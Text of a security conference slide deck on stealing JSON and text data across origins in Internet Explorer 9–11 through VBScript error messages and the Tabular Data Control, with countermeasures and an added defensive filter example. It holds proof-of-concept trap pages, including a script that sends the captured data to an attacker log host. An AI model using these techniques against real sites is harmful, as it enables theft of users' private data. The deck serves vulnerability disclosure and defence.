Bypass SOP, Theft your data
- XSS Allstars from Japan -
Yosuke HASEGAWA
About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
Agenda
Cross-Origin information disclosure
Not XSS, but bypass SOP
Introduce 2 ways for modern IE
VBScript Error msg
Tabular Data Control
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
A JSON array is loaded as VBScript on a trap page created by the attacker
VBScript raises an exception whose error message includes the JSON content
JavaScript can access the JSON content via the error message
VBScript Error Msg
Reading JSON as VBScript src fails → raises an exception
  // Trap page by attacker
  <script src="http://example.jp/target.json"
          language="vbscript">
  </script>
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]
VBScript Error Msg
catch the error msg with an error handler
  GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
  Referer: http://attacker.utf-8.jp/
  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
  <!-- assumes an <img id="img"> element exists on the trap page -->
  <script>
    window.onerror = function( e ){
      document.getElementById( "img" ).setAttribute(
        "src", "http://attacker.utf-8.jp/log?" + e );
    }
  </script>
  <script src="http://example.jp/target.json"
          language="vbscript"></script>
Countermeasure
Add "X-Content-Type-Options: nosniff" to the JSON response
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
[ "secret", "data", "is", "here" ]
VBScript Error Msg - supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 were not.
"Add the X-C-T-O header for IE9-11 to prevent this attack, this is BEHAVIOR BY DESIGN" they said.
Tabular Data Control - TDC
ActiveX control for binding a text file into HTML as a data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default on IE6-IE11 with an older doc-mode
  <meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato
Tabular Data Control
  // Trap page by attacker on attacker.utf-8.jp
  function show(){
    var s = document.getElementById("tdc").recordset.getString();
    alert( s );
  }
  ...
  <meta http-equiv="x-ua-compatible" content="IE=10" >
  <object id="tdc" ondatasetcomplete="show()"
          classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
    <param name="DataURL" value="http://example.jp/target.txt">
  </object>

  // target page containing secret data on example.jp/target.txt
  Content-Type: application/octet-stream
  Content-Disposition: attachment; filename=bindata
  X-Content-Type-Options: nosniff

  @!allow_domains=attacker.utf-8.jp
  secret,data,is,here
Tabular Data Control
The attacker has to insert "@!allow_domains=..." at the top of the target text
Once it is inserted, there is no way to prevent the theft
Unhelpful:
  X-Content-Type-Options: nosniff
  Content-Disposition: attachment
Countermeasure
Restrict access to XHR requests that carry a custom X- header
and / or...
  var xhr = new XMLHttpRequest();
  xhr.open( "GET", "http://example.jp/target.txt", true );
  xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  xhr.send( null );

  GET /target.json HTTP/1.1
  Host: example.jp
  User-Agent: Mozilla/5.0…
  Accept: */*
  X-Requested-With: XMLHttpRequest
Countermeasure (cont.)
Don't allow the attacker to place text at the top of the content
  // target page containing secret data on example.jp/target.txt
  Content-Type: application/octet-stream
  Content-Disposition: attachment; filename=bindata
  X-Content-Type-Options: nosniff

  @!allow_domains=attacker.utf-8.jp
  secret,data,is,here
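The countermeasures on the last two slides, combined into one server-side request filter as an added example (not code from the talk): nosniff on every response, a required X-Requested-With header for resources only XHR should fetch, and a server-owned first line so an attacker's "@!allow_domains=" line can never be at the top. The /api/ prefix, the sentinel line and the in-memory sample resources are assumptions for the example.

```javascript
// Added example, not code from the talk: a request filter applying the three
// countermeasures above: nosniff on every response, a custom X- header
// required for XHR-only resources, and a server-owned first line so that an
// attacker-supplied "@!allow_domains=" line can never be at the top.
// Assumptions: requests are plain objects { path, headers } with lower-cased
// header names; guarded resources live under /api/; the sentinel line is our
// own choice and the legitimate XHR client strips it before parsing.
const PROTECTED_PREFIX = "/api/";
const SENTINEL = ")]}',\n";

// Constructed sample resources standing in for example.jp/target.*
const SAMPLE_RESOURCES = {
  "/api/target.json": {
    contentType: "application/json; charset=utf-8",
    body: '[ "secret", "data", "is", "here" ]',
  },
  "/api/target.txt": {
    contentType: "text/plain; charset=utf-8",
    body: "secret,data,is,here",
  },
};

function loadSample(path) {
  return SAMPLE_RESOURCES[path] || null;
}

// Returns { status, headers, body } for one request.
function handle(req, loadResource) {
  // Countermeasure 1: IE must not sniff JSON/text into VBScript.
  const headers = { "X-Content-Type-Options": "nosniff" };
  if (req.path.startsWith(PROTECTED_PREFIX)) {
    // Countermeasure 2: <script src> and the TDC <object> cannot add request
    // headers, so only XHR from our own pages can present this one.
    if ((req.headers["x-requested-with"] || "") !== "XMLHttpRequest") {
      return { status: 403, headers, body: "" };
    }
  }
  const res = loadResource(req.path);
  if (!res) {
    return { status: 404, headers, body: "" };
  }
  headers["Content-Type"] = res.contentType;
  // Countermeasure 3: the server owns the first line of the body.
  return { status: 200, headers, body: SENTINEL + res.body };
}

// The legitimate XHR client strips the sentinel before using the body.
function stripSentinel(body) {
  return body.startsWith(SENTINEL) ? body.slice(SENTINEL.length) : body;
}
```

Note that the X-Requested-With check only helps because neither <script src> nor the TDC <object> DataURL can attach a custom request header; it is not a substitute for authentication.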
Conclusion
IE has funny behavior even now
Add X-Content-Type-Options to all resources
Restrict access to XHR requests that carry a custom X- header
Question?
hasegawa@utf-8.jp
@hasegawayosuke
http://utf-8.jp/

Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014